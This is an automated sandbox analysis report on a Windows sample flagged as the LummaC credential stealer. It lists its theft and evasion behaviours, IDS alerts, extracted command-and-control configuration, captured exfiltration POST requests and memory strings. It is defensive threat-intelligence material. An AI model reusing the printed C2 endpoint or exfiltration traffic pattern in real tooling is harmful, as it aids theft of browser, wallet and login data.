Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
loader.exe

Overview

General Information

Sample name:loader.exe
Analysis ID:1561467
MD5:eb9da66b64c00bc89fe8bb984995e7da
SHA1:fb0ef230ce7078220b9c0d8795ec88234d9c2f93
SHA256:340de30b05a843bd6a8fbdc1b58f7c3f2e9378c6c1a6b44108d0b7467a5f68c2
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • loader.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: EB9DA66B64C00BC89FE8BB984995E7DA)
    • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • loader.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: EB9DA66B64C00BC89FE8BB984995E7DA)
    • loader.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: EB9DA66B64C00BC89FE8BB984995E7DA)
    • loader.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: EB9DA66B64C00BC89FE8BB984995E7DA)
    • loader.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: EB9DA66B64C00BC89FE8BB984995E7DA)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--5067838847"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: loader.exe PID: 7372JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: loader.exe PID: 7372JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:09:25.528059+010020283713Unknown Traffic192.168.2.449730172.67.162.84443TCP
        2024-11-23T14:09:27.573143+010020283713Unknown Traffic192.168.2.449731172.67.162.84443TCP
        2024-11-23T14:09:29.889674+010020283713Unknown Traffic192.168.2.449732172.67.162.84443TCP
        2024-11-23T14:09:32.141438+010020283713Unknown Traffic192.168.2.449733172.67.162.84443TCP
        2024-11-23T14:09:34.430730+010020283713Unknown Traffic192.168.2.449734172.67.162.84443TCP
        2024-11-23T14:09:36.966027+010020283713Unknown Traffic192.168.2.449735172.67.162.84443TCP
        2024-11-23T14:09:39.553578+010020283713Unknown Traffic192.168.2.449736172.67.162.84443TCP
        2024-11-23T14:09:43.271902+010020283713Unknown Traffic192.168.2.449738172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:09:26.245154+010020546531A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
        2024-11-23T14:09:28.294611+010020546531A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
        2024-11-23T14:09:43.985225+010020546531A Network Trojan was detected192.168.2.449738172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:09:26.245154+010020498361A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:09:28.294611+010020498121A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:09:32.862590+010020480941Malware Command and Control Activity Detected192.168.2.449733172.67.162.84443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: loader.exe.7372.5.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--5067838847"}
        Source: loader.exeReversingLabs: Detection: 47%
        Source: loader.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041A205 CryptUnprotectData,5_2_0041A205
        Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0025C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0025C7DB
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0025C72A FindFirstFileExW,2_2_0025C72A
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0025C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0025C7DB
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+77B878C3h]5_2_00441920
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx ebp, word ptr [eax]5_2_00441920
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0282C029h]5_2_00428BA0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+553BCC3Ah]5_2_0040A440
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov word ptr [eax], cx5_2_004194B0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4C05FCEEh]5_2_0040DDAD
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h5_2_004417F0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov esi, ecx5_2_0042A8D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov byte ptr [eax], dl5_2_004210A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h5_2_0043A120
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov edx, ecx5_2_004291C4
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_0042C990
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ebx, eax5_2_0043C240
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h5_2_00424A50
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov edi, ecx5_2_0040DA6F
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov byte ptr [ebx], cl5_2_0041EA11
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, eax5_2_0041BA2F
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov esi, ecx5_2_0040EAF1
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx eax, byte ptr [esi+edx+0000009Ch]5_2_0042E2B5
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then push 8674A874h5_2_0042531F
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp ecx5_2_0042531F
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx eax, byte ptr [esi+edx+0000009Ch]5_2_0042E32F
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, ebx5_2_0043A3C0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, eax5_2_0041A3F9
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov word ptr [esi], cx5_2_0041F3B0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h5_2_0043C440
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 1B6183F2h5_2_0043C440
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi-4C367DD7h]5_2_00409C50
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-27h]5_2_00428420
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 1B6183F2h5_2_00428420
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-582BE261h]5_2_0041BCD2
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp dword ptr [004485ECh]5_2_00427CE1
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00424CB0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ebx+00h]5_2_00401D70
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp dword ptr [004485ECh]5_2_00427CE1
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp eax5_2_00440510
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp eax5_2_004405D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]5_2_00402D80
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, eax5_2_0042BD80
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then jmp edx5_2_00404E70
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]5_2_00407E00
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then add eax, dword ptr [esp+edx*4+34h]5_2_00407E00
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov word ptr [eax], cx5_2_0042AE3D
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, ebx5_2_00439ED0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+08h]5_2_0040B6E0
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh5_2_0043C750
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, eax5_2_0043C750
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov byte ptr [edx], al5_2_00409F60
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h5_2_0042CF60
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_00401F70
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+50h]5_2_00428F70
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+1Ch]5_2_0041AF7A
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7319702Fh]5_2_0040C7FD
        Source: C:\Users\user\Desktop\loader.exeCode function: 4x nop then mov ecx, eax5_2_0041CF97

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 172.67.162.84:443
        Source: Malware configuration extractorURLs: https://property-imper.sbs/api
        Source: Joe Sandbox ViewIP Address: 172.67.162.84 172.67.162.84
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=90U7KFFO0EDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18126Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5LJLIKW958User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8741Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2XZROZJ1GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8DOWMO1PBPZJPZ3OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1251Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C2USC44DK4GFZQ6J4BRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582608Host: property-imper.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: property-imper.sbs
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: loader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: loader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: loader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: loader.exe, 00000005.00000003.1779722001.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1863948333.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864978713.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1800680835.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1805380680.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
        Source: loader.exe, 00000005.00000003.1863948333.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/%j
        Source: loader.exe, 00000005.00000003.1863948333.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/-
        Source: loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
        Source: loader.exe, 00000005.00000002.1864978713.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apik
        Source: loader.exe, 00000005.00000003.1863948333.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apin
        Source: loader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/i
        Source: loader.exe, 00000005.00000003.1863948333.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
        Source: loader.exe, 00000005.00000003.1863948333.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apitPK
        Source: loader.exe, 00000005.00000003.1709492713.0000000005665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: loader.exe, 00000005.00000003.1709492713.0000000005663000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709558120.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709637829.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731588987.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731353744.0000000005617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: loader.exe, 00000005.00000003.1709558120.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: loader.exe, 00000005.00000003.1709492713.0000000005663000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709558120.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709637829.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731588987.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731353744.0000000005617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: loader.exe, 00000005.00000003.1709558120.00000000055F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: loader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
